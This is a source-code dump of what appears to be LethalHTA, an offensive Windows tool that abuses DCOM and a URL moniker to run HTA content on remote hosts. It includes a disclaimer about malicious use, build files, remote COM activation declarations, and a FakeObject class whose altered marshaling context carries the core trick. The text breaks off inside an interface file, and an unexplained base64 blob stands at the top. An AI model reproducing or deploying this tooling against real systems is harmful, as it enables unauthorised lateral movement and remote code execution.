4KJqCx1K9FBlUdZZlUFtuTLhsV765kqmqgtE6hCjCy9W5mKpSB6LcrkWqllQpLE2OljKh4XeIkhVajPth1ogdLu0FUPtpe8gSxwiYYoI/dD4+Qvi4gzcsAM5A0T6zNaVWB+oLSvAZWHkKaV60F+k3z7v+aPY2EHRFpjhfvfFBc1iDS/y3dG1K61xz+Wgn+klVGs6NkTwcXL2I6WOo3FPu+qCuhfAdMV4v9ulgAFNzSURb4YE+02binLNAo7anoNQs0a2C/b/kITKPPdQKzxiaDm4A8+D2DzDAEpCkmQMYVCMgGVh6AgDRlSdhNQN4E5EcFZHP4n1FAmtX7S9rZlljVi6xaChL9p5SvkHrjSEm2MIsmHgrDhiXWD0/6upbi40iHWTaBLosKn+aTbwQ5OPj8/m0LU76/MjLg9PBeGXlBoohsu9KhZqmMDMQZBDqqI5u3OnLsgfPVkc0BbBgyyjG8zzoyX4s7cxpgzh6MmXIcoudPA4a1XcgSqwXWNaQBF7VdyDq2XUjQ+XLZ8DHtP8XUNVvXZxIcKA/BknliGe0DtmXjOMULd1MvDdGkguPNMuKLPjLHGNrvuzFJG3qi0XiC1Ug0rI4SDV7xGxRJ21qf1TprGNW6i6HpDDIDoWmxWmdfAU03sPIQaLq6WtcyJf/jUws/x4RcfsByvqE3tSTswZfmzBzcyPIcZNkc5mckSzCMhO5i1nWab18tb/vqVwlAMePTr4BKmu8+VIpuAKpYuOuKSWB1wtd6chfiwKVO+ZWkd7yi24g9rokrhr6C0xzHUMCxbLtJV4s4do3EYuAl6A52AdklnQq0XvcA2bL4UnJKR3uAxvGPZNJ1sfZiWaWnbfrcA2TLqgp9PQnScNnvPE+bTMgCeYy85lHgPuczlvpLoiffxEVZbB6hNfYwWz5WxhgtD19s1shov/VzPVZJX5sScQ0lkbeNBVlbFNeCmfuuNPa8L9D6+PeMZtb7uA16GWGNVfdbLTVX/hjWN4da4pI9F2IXnQE3MPMQiqmyMlMnKfAs+c6gWzH1Soqpzb+P9HzFVLvGU5adPydgCU+k6L0qAruGIrhVlHMySK9w/Xn40hbljnkFdNnAygOgS7v6m7RrJ51SdhRIN93EfCgc84cBkO+M2CMCL+S58JXbFXtzignoNTHk0EvIzZHd30MA9OPhX57Ex3L/WAbO/gc= -------------------------------------------------------------------------------- /DISCLAIMER.md: -------------------------------------------------------------------------------- 1 | ### DISCLAIMER 2 | 3 | You expressly understand and agree that LethalHTA (creators and contributors) shall not be liable for any damages or losses resulting from your use of this tool or third-party products that use it. 4 | 5 | Creators aren't in charge of any and have/has no responsibility for any kind of: 6 | 7 | * Unlawful or illegal use of the tool 8 | * Legal or Law infringement (acted in any country, state, municipality, place) by third parties and users 9 | * Act against ethical and / or human moral, ethic, and peoples and cultures of the world 10 | * Malicious act, capable of causing damage to third parties, promoted or distributed by third parties or the user through this tool 11 | 12 | ### Contact 13 | 14 | Feel free to contact info@code-white.com for any questions. 15 | -------------------------------------------------------------------------------- /DotNet/.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /DotNet/.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | *.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | # Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27703.2035 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LethalHTADotNet", "LethalHTADotNet\LethalHTADotNet.csproj", "{7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Debug|x64.ActiveCfg = Debug|x64 19 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Debug|x64.Build.0 = Debug|x64 20 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Release|x64.ActiveCfg = Release|x64 23 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {CD0B0F55-ED35-4755-9EC8-C885ADC0FCE8} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/ComUtils.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | 3 | namespace LethalHTADotNet 4 | { 5 | public static class ComUtils 6 | { 7 | public static IntPtr IID_IUnknownPtr = GuidToPointer("00000000-0000-0000-C000-000000000046"); 8 | 9 | public static IntPtr GuidToPointer(string guid) 10 | { 11 | Guid g = new Guid(guid); 12 | 13 | IntPtr ret = System.Runtime.InteropServices.Marshal.AllocCoTaskMem(16); 14 | System.Runtime.InteropServices.Marshal.Copy(g.ToByteArray(), 0, ret, 16); 15 | 16 | return ret; 17 | } 18 | 19 | [Flags] 20 | public enum CLSCTX : uint 21 | { 22 | CLSCTX_INPROC_SERVER = 0x1, 23 | CLSCTX_INPROC_HANDLER = 0x2, 24 | CLSCTX_LOCAL_SERVER = 0x4, 25 | CLSCTX_INPROC_SERVER16 = 0x8, 26 | CLSCTX_REMOTE_SERVER = 0x10, 27 | CLSCTX_INPROC_HANDLER16 = 0x20, 28 | CLSCTX_RESERVED1 = 0x40, 29 | CLSCTX_RESERVED2 = 0x80, 30 | CLSCTX_RESERVED3 = 0x100, 31 | CLSCTX_RESERVED4 = 0x200, 32 | CLSCTX_NO_CODE_DOWNLOAD = 0x400, 33 | CLSCTX_RESERVED5 = 0x800, 34 | CLSCTX_NO_CUSTOM_MARSHAL = 0x1000, 35 | CLSCTX_ENABLE_CODE_DOWNLOAD = 0x2000, 36 | CLSCTX_NO_FAILURE_LOG = 0x4000, 37 | CLSCTX_DISABLE_AAA = 0x8000, 38 | CLSCTX_ENABLE_AAA = 0x10000, 39 | CLSCTX_FROM_DEFAULT_CONTEXT = 0x20000, 40 | CLSCTX_ACTIVATE_32_BIT_SERVER = 0x40000, 41 | CLSCTX_ACTIVATE_64_BIT_SERVER = 0x80000, 42 | CLSCTX_INPROC = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, 43 | CLSCTX_SERVER = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER, 44 | CLSCTX_ALL = CLSCTX_SERVER | CLSCTX_INPROC_HANDLER 45 | } 46 | 47 | [System.Runtime.InteropServices.DllImport("urlmon.dll")] 48 | public static extern int CreateURLMonikerEx( 49 | IntPtr punk, 50 | [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] string pszDisplayName, 51 | out IMoniker ppmk, 52 | uint flags 53 | ); 54 | 55 | [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential)] 56 | public struct MULTI_QI 57 | { 58 | public IntPtr pIID; 59 | [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.Interface)] 60 | public object pItf; 61 | public int hr; 62 | } 63 | 64 | [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential)] 65 | public class COSERVERINFO 66 | { 67 | public uint dwReserved1; 68 | [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] 69 | public string pwszName; 70 | public IntPtr pAuthInfo; 71 | public uint dwReserved2; 72 | } 73 | 74 | [System.Runtime.InteropServices.DllImport("ole32.dll")] 75 | public static extern void CoCreateInstanceEx( 76 | [System.Runtime.InteropServices.In, System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPStruct)] Guid rclsid, 77 | [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.IUnknown)] object pUnkOuter, 78 | CLSCTX dwClsCtx, 79 | COSERVERINFO pServerInfo, 80 | uint cmq, 81 | [System.Runtime.InteropServices.In, System.Runtime.InteropServices.Out] MULTI_QI[] pResults); 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/FakeObject.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace LethalHTADotNet 5 | { 6 | [ComVisible(true)] 7 | class FakeObject : IMarshal, IMoniker 8 | { 9 | private IMarshal _marshal; 10 | 11 | public FakeObject(IMoniker moniker) 12 | { 13 | this._marshal = (IMarshal)moniker; 14 | } 15 | 16 | public void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid) 17 | { 18 | _marshal.GetUnmarshalClass(riid, pv, 1, pvDestContext, MSHLFLAGS, out pCid); 19 | } 20 | 21 | public void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize) 22 | { 23 | _marshal.GetMarshalSizeMax(riid, pv, 1, pvDestContext, MSHLFLAGS, out pSize); 24 | } 25 | 26 | public void MarshalInterface([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS) 27 | { 28 | _marshal.MarshalInterface(pstm, riid, pv, 1, pvDestContext, MSHLFLAGS); 29 | } 30 | 31 | public void UnmarshalInterface([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IStream pstm, [In] ref Guid riid, out IntPtr ppv) 32 | { 33 | _marshal.UnmarshalInterface(pstm, ref riid, out ppv); 34 | } 35 | 36 | public void ReleaseMarshalData([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IStream pstm) 37 | { 38 | _marshal.ReleaseMarshalData(pstm); 39 | } 40 | 41 | public void DisconnectObject([In] uint dwReserved) 42 | { 43 | _marshal.DisconnectObject(dwReserved); 44 | } 45 | 46 | 47 | public int GetClassID(out Guid pClassID) 48 | { 49 | throw new NotImplementedException(); 50 | } 51 | 52 | public int IsDirty() 53 | { 54 | throw new NotImplementedException(); 55 | } 56 | 57 | public void Load([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IStream pstm) 58 | { 59 | throw new NotImplementedException(); 60 | } 61 | 62 | public void Save([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IStream pstm, [In] int fClearDirty) 63 | { 64 | throw new NotImplementedException(); 65 | } 66 | 67 | public void GetSizeMax([MarshalAs(UnmanagedType.LPArray), Out] ULARGE_INTEGER[] pcbSize) 68 | { 69 | throw new NotImplementedException(); 70 | } 71 | 72 | public void BindToObject([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] ref Guid riidResult, [MarshalAs(UnmanagedType.IUnknown)] out object ppvResult) 73 | { 74 | throw new NotImplementedException(); 75 | } 76 | 77 | public void BindToStorage([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] ref Guid riid, [MarshalAs(UnmanagedType.IUnknown)] out object ppvObj) 78 | { 79 | throw new NotImplementedException(); 80 | } 81 | 82 | public void Reduce([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In] uint dwReduceHowFar, [In, MarshalAs(UnmanagedType.Interface), Out] ref IMoniker ppmkToLeft, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkReduced) 83 | { 84 | throw new NotImplementedException(); 85 | } 86 | 87 | public void ComposeWith([In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkRight, [In] int fOnlyIfNotGeneric, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkComposite) 88 | { 89 | throw new NotImplementedException(); 90 | } 91 | 92 | public void Enum([In] int fForward, [MarshalAs(UnmanagedType.Interface)] out System.Runtime.InteropServices.ComTypes.IEnumMoniker ppenumMoniker) 93 | { 94 | throw new NotImplementedException(); 95 | } 96 | 97 | public void IsEqual([In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkOtherMoniker) 98 | { 99 | throw new NotImplementedException(); 100 | } 101 | 102 | public void Hash(out uint pdwHash) 103 | { 104 | throw new NotImplementedException(); 105 | } 106 | 107 | public int IsRunning([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkNewlyRunning) 108 | { 109 | throw new NotImplementedException(); 110 | } 111 | 112 | public void GetTimeOfLastChange([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [MarshalAs(UnmanagedType.LPArray), Out] FILETIME[] pFileTime) 113 | { 114 | throw new NotImplementedException(); 115 | } 116 | 117 | public void Inverse([MarshalAs(UnmanagedType.Interface)] out IMoniker ppmk) 118 | { 119 | throw new NotImplementedException(); 120 | } 121 | 122 | public void CommonPrefixWith([In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkOther, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkPrefix) 123 | { 124 | throw new NotImplementedException(); 125 | } 126 | 127 | public void RelativePathTo([In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkOther, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkRelPath) 128 | { 129 | throw new NotImplementedException(); 130 | } 131 | 132 | public void GetDisplayName([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [MarshalAs(UnmanagedType.LPWStr)] out string ppszDisplayName) 133 | { 134 | throw new NotImplementedException(); 135 | } 136 | 137 | public void ParseDisplayName([In, MarshalAs(UnmanagedType.Interface)] System.Runtime.InteropServices.ComTypes.IBindCtx pbc, [In, MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In, MarshalAs(UnmanagedType.LPWStr)] string pszDisplayName, out uint pchEaten, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkOut) 138 | { 139 | throw new NotImplementedException(); 140 | } 141 | 142 | public void IsSystemMoniker(out uint pdwMksys) 143 | { 144 | throw new NotImplementedException(); 145 | } 146 | 147 | 148 | } 149 | } 150 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/Interfaces.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | using System.Runtime.InteropServices.ComTypes; 5 | 6 | namespace LethalHTADotNet 7 | { 8 | public struct FILETIME 9 | { 10 | public int dwLowDateTime; 11 | public int dwHighDateTime; 12 | } 13 | 14 | public struct ULARGE_INTEGER 15 | { 16 | public ulong QuadPart; 17 | } 18 | 19 | [ComImport] 20 | [Guid("0000010C-0000-0000-C000-000000000046")] 21 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 22 | public interface IPersist 23 | { 24 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 25 | int GetClassID(out Guid pClassID); 26 | } 27 | 28 | [ComImport] 29 | [Guid("00000109-0000-0000-C000-000000000046")] 30 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 31 | public interface IPersistStream : IPersist 32 | { 33 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 34 | new int GetClassID(out Guid pClassID); 35 | 36 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 37 | int IsDirty(); 38 | 39 | [MethodImpl(MethodImplOptions.InternalCall)] 40 | void Load([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm); 41 | 42 | [MethodImpl(MethodImplOptions.InternalCall)] 43 | void Save([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm, [In] int fClearDirty); 44 | 45 | [MethodImpl(MethodImplOptions.InternalCall)] 46 | void GetSizeMax([Out] [MarshalAs(UnmanagedType.LPArray)] ULARGE_INTEGER[] pcbSize); 47 | } 48 | 49 | [ComImport] 50 | [Guid("0000000F-0000-0000-C000-000000000046")] 51 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 52 | public interface IMoniker : IPersistStream 53 | { 54 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 55 | new int GetClassID(out Guid pClassID); 56 | 57 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 58 | new int IsDirty(); 59 | 60 | [MethodImpl(MethodImplOptions.InternalCall)] 61 | new void Load([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm); 62 | 63 | [MethodImpl(MethodImplOptions.InternalCall)] 64 | new void Save([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm, [In] int fClearDirty); 65 | 66 | [MethodImpl(MethodImplOptions.InternalCall)] 67 | new void GetSizeMax([Out] [MarshalAs(UnmanagedType.LPArray)] ULARGE_INTEGER[] pcbSize); 68 | 69 | [MethodImpl(MethodImplOptions.InternalCall)] 70 | void BindToObject([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] ref Guid riidResult, [MarshalAs(UnmanagedType.IUnknown)] out object ppvResult); 71 | 72 | [MethodImpl(MethodImplOptions.InternalCall)] 73 | void BindToStorage([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] ref Guid riid, [MarshalAs(UnmanagedType.IUnknown)] out object ppvObj); 74 | 75 | [MethodImpl(MethodImplOptions.InternalCall)] 76 | void Reduce([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] uint dwReduceHowFar, [In] [Out] [MarshalAs(UnmanagedType.Interface)] ref IMoniker ppmkToLeft, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkReduced); 77 | 78 | [MethodImpl(MethodImplOptions.InternalCall)] 79 | void ComposeWith([In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkRight, [In] int fOnlyIfNotGeneric, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkComposite); 80 | 81 | [MethodImpl(MethodImplOptions.InternalCall)] 82 | void Enum([In] int fForward, [MarshalAs(UnmanagedType.Interface)] out IEnumMoniker ppenumMoniker); 83 | 84 | [MethodImpl(MethodImplOptions.InternalCall)] 85 | void IsEqual([In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkOtherMoniker); 86 | 87 | [MethodImpl(MethodImplOptions.InternalCall)] 88 | void Hash( out uint pdwHash); 89 | 90 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 91 | int IsRunning([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkNewlyRunning); 92 | 93 | [MethodImpl(MethodImplOptions.InternalCall)] 94 | void GetTimeOfLastChange([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [Out] [MarshalAs(UnmanagedType.LPArray)] FILETIME[] pFileTime); 95 | 96 | [MethodImpl(MethodImplOptions.InternalCall)] 97 | void Inverse([MarshalAs(UnmanagedType.Interface)] out IMoniker ppmk); 98 | 99 | [MethodImpl(MethodImplOptions.InternalCall)] 100 | void CommonPrefixWith([In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkOther, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkPrefix); 101 | 102 | [MethodImpl(MethodImplOptions.InternalCall)] 103 | void RelativePathTo([In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkOther, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkRelPath); 104 | 105 | [MethodImpl(MethodImplOptions.InternalCall)] 106 | void GetDisplayName([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [MarshalAs(UnmanagedType.LPWStr)] out string ppszDisplayName); 107 | 108 | [MethodImpl(MethodImplOptions.InternalCall)] 109 | void ParseDisplayName([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx 